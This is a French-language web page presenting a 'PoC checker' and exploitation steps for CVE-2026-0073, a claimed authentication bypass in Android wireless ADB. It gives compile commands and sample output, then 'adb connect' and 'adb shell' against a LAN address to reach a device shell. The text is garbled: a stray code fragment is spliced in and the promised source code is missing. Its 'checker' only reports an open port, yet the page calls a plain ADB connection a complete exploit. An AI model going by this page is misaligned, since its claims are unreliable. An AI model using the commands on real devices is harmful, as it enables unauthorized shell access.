
CVE-2026-0073
CVE-2026-0073 est une vulnérabilité critique de contournement d'authentification dans l'ADB sans fil d'Android (daemon adbd).
Un attaquant sur le même réseau peut contourner l'authentification TLS mutuelle et se connecter à l'appareil sans approbation de l'utilisateur ni appariement préalable.
| Élément | Détails |
|---|---|
| Identifiant CVE | CVE-2026-0073 |
| Gravité | Critique |
| Score CVSS | 8.8 |
| Composant concerné | adbd (Android Debug Bridge) - Gestionnaire TLS |
| Type | Contournement d'authentification |
| Impact | Accès shell à distance (utilisateur shell) |
| Correctif | Bulletin de sécurité Android de mai 2026 |
Corrigé dans : niveau de correctif de sécurité 2026-05-01 et ultérieur.
shelladbd_tls_verify_cert()L'erreur se produit parce que le fichier CVE-2026-0073-Checker.cpp n'existe pas encore.
nano CVE-2026-0073-Checker.cpp
Copiez et collez le code complet ci-dessous dans l'éditeur :
Enregistrez et quittez (Ctrl + X → Y → Entrée)
Compilez à nouveau :
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
Voici exactement ce que vous verrez si le programme C++ fonctionne correctement sur un appareil Android vulnérable :
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN en vert → Le port ADB est à l'écoute.Exécutez ces commandes :
adb connect 192.168.1.105:5555
S'il affiche :
connected to 192.168.1.105:5555
Puis tapez :
adb shell
Vous devriez accéder à l'appareil :
pixel8:/ $
C'est une exploitation réussie complète.
Ce PoC est uniquement destiné à un usage éducatif et à des tests autorisés.
Vous ne pouvez utiliser cet outil que sur des appareils vous appartenant ou pour lesquels vous avez l'autorisation explicite de tester. Toute utilisation non autorisée est illégale et strictement interdite.
Utilisez-le à vos propres risques. L'auteur n'est pas responsable des dommages ou des conséquences juridiques.
🎯 Conçu avec prudence — À utiliser uniquement sur des appareils autorisés.